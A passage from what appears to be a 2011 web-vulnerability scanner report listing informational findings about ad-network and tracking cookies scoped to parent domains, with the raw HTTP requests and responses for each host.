48XslO7BtR/Lkh74WCTKmQ2rc9H80YXAs2x54Unx8/hxsRu+6b2TFgabOY74v0H6PliIbZ+0ydXPZvr6GGWt1iBTOoJfcT7e0r0Qe5tUy6iijtrwNpWUysX3FcgWlT9CuHU3gJRHyJPxVGfJBTFJujfwmoI+hRnc0LKORZAW1k5UeRkcRWCxLU52Me6ffBrSbQX2gnquKfS/b2VxpsWIm9rqf9zggWUDUrLtjKHHb1VVj+DgCD8+I6KxeXWrM0HOR10VA4/0vBbIbNfATwNEy72w8TZPWEb3p6LuFVvkrmJba841Ct2n2oS5ZeOq92UJQC6zjcYBLSxhF/t0AXtP7snMG+fZJDQwTvYGIQxtQZHil+3kXGDsffUdM3gb5syA9TCD/GpqE7Q3zYla7eCr5CWRdyEo3aZArBm7SqICFsHGhZSy//kxyHIB1otYfec3oESL3KgwPx4NyC/mDgzZQ1wt8ul6U9FCachkJ20hyVwespxYmr1+C05loldoIpguKfJkypsL+OS6RJU5FePTqpTUUoONn9nUKTy2Lsf5oc+Ek523257M/WcT6RgFIYhPu9y3Yr0rRdU0ulvPgycSTBrckLVb+D20GBuAyvfHoRoF62HV3ayGi/zh8siNJrhagSxaDEwXFucKUtavUMYEKTuRC8j2Ms7UyozH2JneopaDxgNJk+MKoVo2q5POAaOWl4Qa+4MMIBI5QEx757bfG9N5l7UiP4bmcg7jXVgOBlxvHVpqzaHZqbeE+hJAaYTgNJzGErBSf/JcZb+Bq1cxASNCLskHhpluAui7Mx3UfrKvZg1TBQAUT8tUmtBQVGG2rNrP8rUiTrIqJusRRAFGN4Z3Q4huvP+/6v0ly/Ajia3r0+PTunlBnF8m6hgek8/eD/1KZcpcezRJIH+FJffqEgwDG4XaW9PDSOnZVfZ97kzQFJ1DsgF7eT6O/leYLQbV7H1yx7g68Z9yK9XBfVT3Gp8e2mhq9IibPvafvXO9k9+fkyyzaLP+99jIeYOAGU/SjLsIF0PeYW9M3EVanQgdnNYYMm5zSlzveLFp1n6uSQCAGzn5SFQqGhfFuWQmTiQt2RxusqhOc/01vsL/Xim8k33jwRkhzBq27oQDyOwKJknkzJXI+dt6w/jVSbNHb/KGbMBj+GrY7ubtdTvUsuH"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:01:39 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

9.6. http://adx.adnxs.com/mapuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIvoIBEAoYASABKAEw3eiy8AQQ3eiy8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)lBAbL-*cOV4KBhCoR25DY(2vp1RESM(2J.fYtvlqPT[cJfVZWo!V7]TG9T)_>#0+zM2gLr6r'WB<PBs]9<X5zx]>^#n%)np%pON9vhK:9sozd5e72axY9NVZ-Im3Zl[S6U?nDk]]Xl0Xr0'9Q2+(5tDV>!8=:3mY$vNb@+D3Ap?G2CBJ4BAix#<U2/j@vzKW10dnb=eCp5B>h>13URKjY5=1]w9C4HMCvuXQGV:it%G2`n9'(TGCQPS<$z^e]Z6NT!6(]HiUVWS)l>c@S8hzH=`<c`vTNPHYaQatBmG@L<igeF=L:^rOE'Hh@#EVR.`=Ux-/<GuTk06++UaGeq'fCBda.X#5PD%g*pg(D*8cY.faZU4k(iYnRV)LFflEn[fHA_LLir)NJ*<UER3ZsiPR>'5esbJ6E8wJTgDvz0]o5KL#F%J7s%dO.T8<793E1psbJ#N3F[i-tl_w_uU>pc>OI(54nFrLmI9z-JW>V/5Y17SfF#Dw)<8nEGEcWzw+u%cChmb4sj7vmp8Od3LAg``vx]:q5^0bCr_Cf.Fhu[tN+9H5I9@_tH4p>Gujl>i$HGt4v8Sw>Lr<m=^M?dyN<JFq0>r=MRS4E+.tPFsOwox/t_9W(AW))oO^b9Xw!u2#qD12xd^$tmhgU5n.:$%hL+W<DJ<:Pz0B98#Xqpp?6Wy9Oa3_U!_mQ0wXAsekf4^D8rmfvGk2vLba!V(^MK7<<jaaH$q-TUqB'0!$_/J2aEL.bEnn+lmE)fcs3@JzL-8_qNIb.7`cZ4G#S'Y?4)j9xsUji[+!jWL:^kCTR)%?W^

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lBAbL-*cOV4KBhCoR25DY(2vp1RESM(2J.fYtvlqPT[cJfVZWo!V7]TG9T)_>#0+zM2gLr6r'WB<PBs]9<X5zx]>^#n%)np%pON9vhK:9sozd5e72axY9NVZ-Im3Zl[S6U?nDk]]Xl0Xr0'9Q2+(5tDV>!8=:3mY$vNb@+D3Ap?G2CBJ4BAix#<U2/j@vzKW10dnb=eCp5B>h>13URKjY5=1]w9C4HMCvuXQGV:it%G2`n9'(TGCQPS<$z^e]Z6NT!6(]HiUVWS)l>c@S8hzH=`<c`vTNPHYaQatBmG@L<igeF=L:^rOE'Hh@#EVR.`=Ux-/<GuTk06++UaGeq'fCBda.X#5PD%g*pg(D*8cY.faZU4k(iYnRV)LFflEn[fHA_LLir)NJ*<UER3ZsiPR>'5esbJ6E8wJTgDvz0]o5KL#F%J7s%dO.T8<793E1psbJ#N3F[i-tl_w_uU>pc>OI(54nFrLmI9z-JW>V/5Y17SfF#Dw)<8nEGEcWzw+u%cChmb4sj7vmp8Od3LAg``vx]:q5^0bCr_Cf.Fhu[tN+9H5I9@_tH4p>Gujl>i$HGt4v8Sw>Lr<m=^M?dyN<JFq0>r=MRS4E+.tPFsOwox/t_9W(AW))oO^b9Xw!u2#qD12xd^$tmhgU5n.:$%hL+W<DJ<:Pz0B98#Xqpp?6Wy9Oa3_U!_mQ0wXAsekf4^D8rmfvGk2vLba!V(^MK7<<jaaH$q-TUqB'0!$_/J2aEL.bEnn+lmE)fcs3@JzL-8_qNIb.7`cZ4G#S'Y?4)j9xsUji[+!jWL:^kCTR)%?W^; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Wed, 06 Jul 2011 15:39:08 GMT

GIF89a.............!.......,........@..L..;

9.7. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6635176&rn=1308436746&c7=http%3A%2F%2Fbcp.crwdcntrl.net%2F4%2Fc%3D34%257Crand%3D395066690%257Cpv%3Dy%257Crt%3Difr&c9=http%3A%2F%2Fwww.bebo.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=34%7Crand=395066690%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 06 Jul 2011 11:22:09 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Fri, 05-Jul-2013 11:22:09 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


9.8. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p HTTP/1.1
Host: b.scorecardresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Length: 0
Location: http://b.scorecardresearch.com/p2?
Date: Wed, 06 Jul 2011 11:21:27 GMT
Connection: close
Set-Cookie: UID=845ba2-96.6.41.192-1309951287; expires=Fri, 05-Jul-2013 11:21:27 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


9.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5650363~~0~~~^ebAdDuration~899~0~01020&OptOut=0&ebRandom=0.8620431364979595&flv=10.3181&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
Origin: http://pubads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=6d1502f0-782c-4c66-9617-aa4652ec4df13IV010; expires=Tue, 04-Oct-2011 07:36:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.3181&RES=128&WMPV=0; expires=Tue, 04-Oct-2011 07:36:40 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 06 Jul 2011 11:36:39 GMT
Connection: close
Content-Length: 0


9.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2800593&PluID=0&w=300&h=250&ncu=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3tv7QUUUTsa3EM_ylAekkezuAa3mhMIBo5ejqBCFk__xOwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0xNzY3NDYzNTAzNTIwODY3oAGrl7rtA7IBDHd3dy5iZWJvLmNvbboBCjMwMHgyNTBfYXPIAQnaARRodHRwOi8vd3d3LmJlYm8uY29tL5gCxBPAAgXIApWysAvgAgDqAhlCZWJvX0hvbWVfMzAweDI1MF9BVEZMZWZ0qAMB6APCBOgD0wHoA_gD9QMAAIDB4AQBgAbPpJns29D66cwB%26num%3D1%26sig%3DAGiWqtwsO8bMZJ6jQcjqukrS_j5W81cmAg%26client%3Dca-pub-1767463503520867%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1d0i0ts0JCfAI6XYs8DR1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgC0CRj.%2526redirectURL%253D&ord=ThRFQQAEG8YK5TlPHdsIpA==&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; ActivityInfo=000dg4csN%5f000db5csN%5f000tbQcu6%5f000rFIcsM%5f000tbRcu6%5f; A3=gs35b0E.0ca7000009bExaZS0084o00002h8evaYRd0bI400000kYwuaZXq09MY00001kSEGaZWa03sY00001lp66b0xe0dMv00002lGhvb0Ah0cEt00003kPIlaZWa03sY00000kFaLa.2L09EZ00001jem9a.2L0c7wa.2L1kHgIb0v.02WG00001kLQDb0xt0cbO00001lEOyaYx40cie00001h51Tb0yn0ca700002eBxyaZST03iw00001h4.ob0xr0ca700002hePeb0wK0cbO00001l7XCa+WC08Y500001lzuRa+WF0ckj00001h4.pb0vz0ca700001h51Sb0Ah0ca700001lFP5aZRG0dSu00001lkqFa.2B06hH00001leMha.2F06hH00001jmcDa.2B0c7w00001jDBSaZUd0cbS00001kovFb0xt0cjc00002l.wtb0wj07Nz00001kSCsaZWb03sY00001le66b1nb02WG00001lGkWb0vy0cEt00001jmdZa.2F0c7w00001jDDva+WC0cbS00001jDCqa+WC0cbS00001hePyb0xq0cbO00001lu2rb0yg04m400001gs36b0xr0ca700000iyQIaYRd0bnA00001lu0naYvn0czN00002iz3QaZRG0bnA00001; B3=78ox0000000001vc835N0000000001vjanad0000000001vc990p0000000001v5atH70000000001vfawTK0000000002vjaFbT0000000001vmaKr10000000001vjaJmE0000000001vcajpm0000000001vcajpn0000000000vc9l7u0000000001vf8SCH0000000001vcamoJ0000000001v59xv30000000001vf9xvo0000000001vc82MD0000000003vjaF580000000001vk82MC0000000003vkaAsi0000000001vf9xv40000000001vf8n.z0000000000v9afgy0000000001vf838g0000000001vj9yJj0000000001vj8SC30000000001v982ME0000000000vjaHLh0000000001vfaF7y0000000002v89u4N0000000002vj838c0000000001vjawPH0000000001vf9.360000000001v89i8L0000000001vf82MA0000000000vkajpj0000000001vc90mq0000000001v54ZUH0000000002vc7dNF0000000001vjaKr20000000003vk

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=gs35b0E.0ca7000009bExaZS0084o00002kYwuaZXq09MY00001h8evaYRd0bI400000lGhvb0Ah0cEt00003lp66b0xe0dMv00002kSEGaZWa03sY00001kPIlaZWa03sY00000kHgIb0v.02WG00001jem9a.2L0c7wa.2L1kFaLa.2L09EZ00001lEOyaYx40cie00001kLQDb0xt0cbO00001h4.ob0xr0ca700002eBxyaZST03iw00001h51Tb0yn0ca700002h51Sb0Ah0ca700001h4.pb0vz0ca700001lzuRa+WF0ckj00001l7XCa+WC08Y500001hePeb0wK0cbO00001lzuXb3sV0ckj00001leMha.2F06hH00001lkqFa.2B06hH00001lFP5aZRG0dSu00001kovFb0xt0cjc00002jDBSaZUd0cbS00001jmcDa.2B0c7w00001kSCsaZWb03sY00001l.wtb0wj07Nz00001jDCqa+WC0cbS00001jDDva+WC0cbS00001jmdZa.2F0c7w00001lGkWb0vy0cEt00001le66b1na02WG00001hePyb0xq0cbO00001gs36b0xr0ca700000lu2rb0yg04m400001iz3QaZRG0bnA00001iyQIaYRd0bnA00001; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=78ox0000000001vcawTK0000000002vjatH70000000001vf990p0000000001v5anad0000000001vc835N0000000001vjajpm0000000001vcaJmE0000000001vcaKr10000000001vjaFbT0000000001vm9l7u0000000001vfajpn0000000000vcamoJ0000000001v58SCH0000000001vc9xv30000000001vf9xvo0000000001vc82MD0000000003vj838g0000000001vjafgy0000000001vf8n.z0000000000v99xv40000000001vfaAsi0000000001vf82MC0000000003vkaF580000000001vk9yJj0000000001vj82ME0000000000vj8SC30000000001v99u4N0000000002vjaF7y0000000002v8aHLh0000000002vs9i8L0000000001vf9.360000000001v8awPH0000000001vf838c0000000001vjaKr20000000003vk7dNF0000000001vj4ZUH0000000002vc90mq0000000001v5ajpj0000000001vc82MA0000000000vk; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 06 Jul 2011 11:21:39 GMT
Connection: close
Content-Length: 2366

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

9.11. http://bstats.adbrite.com/adserver/behavioral-data/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /adserver/behavioral-data/0

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:762701:20861280:E3F32BD05A8DDF4D5646D79640088B:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MtDJSMoyqkkvyKoqTy5IrjG0MizJqyjIsDK1MszPq1CqBQA%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=CiMKBjc0MjY5NxjY6J2rHyITNDMyNTg5NzI4OTgzNjQ4MTgzMAouCgY3NjI3MDEYva3q3iYiHkUzRjMyQkQwNUE4RERGNEQ1NjQ2RDc5NjQwMDg4QhAB; ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; vsd=0@1@4e144551@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; path=/; domain=.adbrite.com; expires=Sat, 03-Jul-2021 15:39:06 GMT
Set-Cookie: vsd=0@2@4e14819a@view.atdmt.com; path=/; domain=.adbrite.com; expires=Fri, 08-Jul-2011 15:39:06 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:06 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

9.12. http://cang.baidu.com/do/add  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cang.baidu.com
Path:   /do/add

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /do/add?it=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&iu=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&fr=ien&dc= HTTP/1.1
Host: cang.baidu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:26 GMT
Server: apache 1.0.9.0
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Set-Cookie: BAIDUID=92E2D2F2A0513651099D245A96DCDBBE:FG=1; expires=Wed, 06-Jul-41 11:21:26 GMT; path=/; domain=.baidu.com
Content-Type: text/html
Cache-Control: no-cache
Connection: close
Content-Length: 7393

<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xh
...[SNIP]...

9.13. http://clk.atdmt.com/MRT/go/285207471/direct/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /MRT/go/285207471/direct/01/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MRT/go/285207471/direct/01/ HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://view.atdmt.com/action/atlasdmt_home
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Wed, 06 Jul 2011 11:40:44 GMT
Connection: close


9.14. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=3831&action=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8496530639253255806

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8496530639253255806; Domain=.p-td.com; Expires=Mon, 02-Jan-2012 11:21:57 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 11:21:56 GMT

GIF89a.............!.......,...........D..;

9.15. https://ebanking.ubs.com/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ebanking.ubs.com
